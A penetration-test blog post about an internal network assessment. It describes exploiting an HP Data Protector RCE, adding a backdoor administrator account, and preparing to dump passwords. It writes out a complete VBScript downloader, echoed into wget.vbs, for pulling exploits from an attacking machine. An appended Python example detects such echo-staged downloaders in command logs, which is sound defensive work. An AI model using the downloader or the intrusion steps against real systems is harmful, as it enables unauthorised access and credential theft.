Wget For Windows
Pentesting in different environments brings various challenges. I would like to share my experience with a recent internal network assessment, the challenges I faced and how I was able to get over them.
So, as usual, the pentest started with scanning the various networks. Apart from a few Cisco default credentials, there was nothing more in the environment that could give me something juicy. Finally one of my scans revealed that a few of the systems were vulnerable to the HP Data Protector remote code execution. Thank you Lord!!! I quickly fired up Metasploit and used a meterpreter payload and NOTHING!! Not to worry.
I downloaded the Python exploit from exploit-db and boom, RCE.
Next I checked the privileges this service was running with. Administrator ☺
I made a user on the system and added the user to the Administrators group and the Remote Desktop Users group.
Now that I was in the box I wanted to dump the passwords using pwdump.exe, but for some reason copy and paste wasn’t working. Now there are two ways to go about this problem and both involve using our attacking machine as a server.
I always use “python -m SimpleHTTPServer 80” to serve my exploits. So I opened the browser to connect to my attacking machine. The browser wouldn’t connect to my machine.
Now a Linux box comes with various command-line browsers/tools like curl, wget, fetch, scp. Someone famous once said “If you don’t have it, create it”. So let’s create our own wget on Windows.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Now that you have your own wget you can get over the restrictions put on the browser to download all the exploits you want. ☺
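Seen from the monitoring side, a script assembled line by line with echo redirects is easy to recognise in captured command text. The following Python is an added example, not part of the original post: it groups such commands per host and target file and flags scripts that pair one of the HTTP COM objects used above with Scripting.FileSystemObject. It assumes command lines are being captured somewhere (for example from `cmd.exe /c` invocations); the events, host names and the `find_staged_downloaders` name are constructed for illustration.

```python
import re
from collections import defaultdict

# "echo <text> > file.vbs" / ">> file.vbs", with or without a "cmd.exe /c" prefix.
ECHO_REDIRECT = re.compile(
    r'\becho\s+(?P<text>.*?)\s*>{1,2}\s*"?(?P<path>[^\s"]+\.(?:vbs|vbe|js))"?\s*$',
    re.IGNORECASE)

# COM ProgIDs the script on this page tries for HTTP, and the one it writes files with.
HTTP_PROGIDS = ("winhttp.winhttprequest", "msxml2.serverxmlhttp", "microsoft.xmlhttp")
FILE_PROGID = "scripting.filesystemobject"

def find_staged_downloaders(events, min_lines=3):
    """events: iterable of (host, command_line) pairs. Returns a list of findings."""
    staged = defaultdict(list)  # (host, script path) -> script lines echoed into it
    for host, cmdline in events:
        m = ECHO_REDIRECT.search(cmdline)
        if m:
            staged[(host, m.group("path").lower())].append(m.group("text"))
    findings = []
    for (host, path), lines in staged.items():
        body = "\n".join(lines).lower()
        http_hits = [p for p in HTTP_PROGIDS if p in body]
        # Flag only scripts that both fetch over HTTP and write to disk.
        if len(lines) >= min_lines and http_hits and FILE_PROGID in body:
            findings.append({"host": host, "script": path,
                             "lines": len(lines), "http_objects": http_hits})
    return findings

# Constructed sample events; host names and the notify.vbs line are made up.
SAMPLE_EVENTS = [
    ("WS-01", 'echo strUrl = WScript.Arguments.Item(0) > wget.vbs'),
    ("WS-01", 'echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs'),
    ("WS-01", 'echo http.Open "GET", strURL, False >> wget.vbs'),
    ("WS-01", 'cmd.exe /c echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs'),
    ("WS-01", 'echo ts.Close >> wget.vbs'),
    ("WS-02", 'echo MsgBox "backup finished" > notify.vbs'),
    ("WS-02", 'ipconfig /all'),
]

if __name__ == "__main__":
    for finding in find_staged_downloaders(SAMPLE_EVENTS):
        print(finding)
```

Commands typed into an interactive cmd.exe window do not create new processes, so process-creation logs alone will miss them; file-creation events for the resulting .vbs and outbound connections from cscript.exe or wscript.exe cover that gap.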
Happy Hacking ☺